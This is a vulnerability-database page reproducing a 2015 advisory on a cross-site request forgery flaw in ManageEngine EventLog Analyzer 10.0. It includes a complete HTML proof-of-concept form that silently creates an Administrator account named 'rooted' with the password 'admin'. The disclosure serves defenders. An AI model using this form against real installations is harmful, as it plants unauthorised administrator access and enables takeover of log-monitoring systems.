Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32175
HistoryJun 08, 2015 - 12:00 a.m.

ManageEngine EventLog Analyzer V:10.0 CSRF Vulnerability

2015-06-0800:00:00
vulners.com
24
JSON

=========================================================================================
CSRF Vulnerability in ManageEngine EventLog Analyzer Version :10.0, Build Number : 10001

. contents:: Table Of Content

Overview

  • Title : ManageEngine EventLog Analyzer Version 10.0 Cross Site Request Forgery
  • Author: Akash S. Chavan
  • Product Homepage: https://www.manageengine.com/products/eventlog/
  • Severity: HIGH
  • Version Affected: Version 10.0, Build Number: 10001 and mostly prior to it
  • Version Tested : Version 10.0 Build Number: 10001
  • version patched:

About Vulnerability

This products is vulnerable to a CSRF attack meaning that the attacker can perform any action without user's knowledge.

Vulnerability Class

Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)

Steps to Reproduce: (POC)

After installing the plugin

  1. Logon into the application.
  2. Create the HTML file containing the below PoC code.
  3. Edit userName parameter with the name of the user you wish to add.
  4. After editing open the same HTML file in browser, there will be a Click me Button.
  5. Click the button.
  6. Now goto to first tab and hit F5 to refresh.
  7. You should see the new user. with the name given by us.

CSRF POC Code

<html>
<body>
<form action="http://127.0.0.1:8400/event/userManagementForm.do&quot; method="POST">
<input type="hidden" name="domainId" value="" />
<input type="hidden" name="roleId" value="" />
<input type="hidden" name="addField" value="true" />
<input type="hidden" name="userType" value="Administrator" />
<input type="hidden" name="userName" value="rooted" />
<input type="hidden" name="pwd1" value="admin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="userGroup" value="Administrator" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="AddSubmit" value="Add User" />
<input type="hidden" name="alpha" value="" />
<input type="hidden" name="userIds" value="" />
<input type="hidden" name="roleName" value="" />
<input type="hidden" name="selDevices" value="" />
<input type="hidden" name="doAction" value="" />
<input type="hidden" name="productName" value="eventlog" />
<input type="hidden" name="licType" value="Prem" />
<input type="hidden" name="next" value="" />
<input type="hidden" name="currentUserId" value="1" />
<input type="hidden" name="isAdminServer" value="false" />
<input type="submit" value="Click Me" />
</form>
</body>
</html>

credits

JSON